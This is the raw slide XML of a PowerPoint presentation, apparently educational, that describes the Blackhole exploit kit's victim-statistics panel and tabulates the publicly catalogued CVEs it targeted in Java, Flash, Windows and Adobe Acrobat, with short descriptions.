            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A185EFE6-F6C7-4A63-B07A-EACC2D3D3A4C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="190832" y="3228230"/>
            <a:ext cx="1590261" cy="1733384"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 93167"/>
              <a:gd name="adj2" fmla="val -755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Fraction of visitors who were successfully infected</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA0279C1-715C-4AA7-B84B-5B49A2FC735C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1518699" y="3770906"/>
            <a:ext cx="4643562" cy="3027459"/>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6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B77B36DC-C4B4-444A-9F48-2FA22F0A9740}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="190832" y="2441049"/>
            <a:ext cx="1590261" cy="995901"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 92667"/>
              <a:gd name="adj2" fmla="val 1000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Browser and OS statistics from victims</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF788AE9-FFB9-4F5B-B392-B0A85C481C9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6029739" y="683812"/>
            <a:ext cx="4643562" cy="1661823"/>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7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5167244D-0B74-4127-A234-E6EAFF3672E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10156671" y="2603058"/>
            <a:ext cx="1590261" cy="1250343"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -123333"/>
              <a:gd name="adj2" fmla="val -921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Success rate of different exploits</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36B2297B-6320-4DCF-9439-E7AC7EC06AAB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6029739" y="2364519"/>
            <a:ext cx="4643562" cy="4171453"/>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peech Bubble: Rectangle 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE2851BC-E29A-492B-B713-15BB9A41F4E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10156671" y="989937"/>
            <a:ext cx="1590261" cy="995901"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -98333"/>
              <a:gd name="adj2" fmla="val 1176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Locations of victims</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="270694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42" presetClass="exit" presetSubtype="0" fill="hold" grpId="1" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="ppt_y+.1"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>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grpId="1" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="barn(inVertical)">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42" presetClass="exit" presetSubtype="0" fill="hold" grpId="1" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="38" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="39" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="40" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="ppt_y+.1"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="41" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:se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par>
                                <p:cTn id="46" presetID="42"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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="49" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="5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grpId="1" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="barn(inVertical)">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42" presetClass="exit" presetSubtype="0" fill="hold" grpId="1" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="57" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="58" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="59" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="ppt_y+.1"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="60" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="61" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="62" presetID="16" presetClass="entr" presetSubtype="21"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barn(inVertical)">
                                      <p:cBhvr>
                                        <p:cTn id="64" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="12"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="65" presetID="42"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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="68" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="13"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="6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6" grpId="0" animBg="1"/>
      <p:bldP spid="6" grpId="1" animBg="1"/>
      <p:bldP spid="7" grpId="0" animBg="1"/>
      <p:bldP spid="7" grpId="1" animBg="1"/>
      <p:bldP spid="9" grpId="0" animBg="1"/>
      <p:bldP spid="9" grpId="1" animBg="1"/>
      <p:bldP spid="8" grpId="0" animBg="1"/>
      <p:bldP spid="8" grpId="1"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B1C5-A105-43FF-B1B7-9FE5A661501F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploits Used by Blackhole</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94757E5B-147A-4ED2-9539-694A60C5668D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1651498860"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="155388" y="1690688"/>
          <a:ext cx="11881224" cy="4754880"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2217746">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1513021390"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2064368">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1498624372"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="7599110">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="413608111"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>CVE</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>Target</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>Description</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1241705697"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>CVE-2011-3544</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>Java</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>Oracle Java SE Rhino Script Engine Remote Code Execution Vulnerability</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="238205063"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>CVE-2011-2110</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>Flash</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>Adobe Flash Player unspecified code execution</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="363087556"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>CVE-2011-0611</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>Flash</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>Adobe Flash Player unspecified code execution</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="449939934"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>CVE-2010-3552</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>Java</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>Skyline</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="507812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CVE-2010-1885</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>Windows</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>Microsoft Windows Help and Support Center</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="19253953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CVE-2010-1423</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>Java</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>Java Development Toolkit insufficient argument validation</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="16007869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CVE-2010-0886</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>Java</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>Unspecified vulnerability</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="19634182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CVE-2010-0842</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>Java</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>JRE </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
                        <a:t>MixerSequencer</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t> invalid array index</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="17487552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CVE-2010-0840</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>Java</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>Java trusted methods chaining</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="27241914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CVE-2010-0188</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>Adobe Acrobat</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
                        <a:t>LibTIFF</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t> integer overflow</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3796646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CVE-2010-4324</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>Adobe Acrobat</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>Use after free vulnerability in </a:t>
                      </a:r>
                      <a:r>
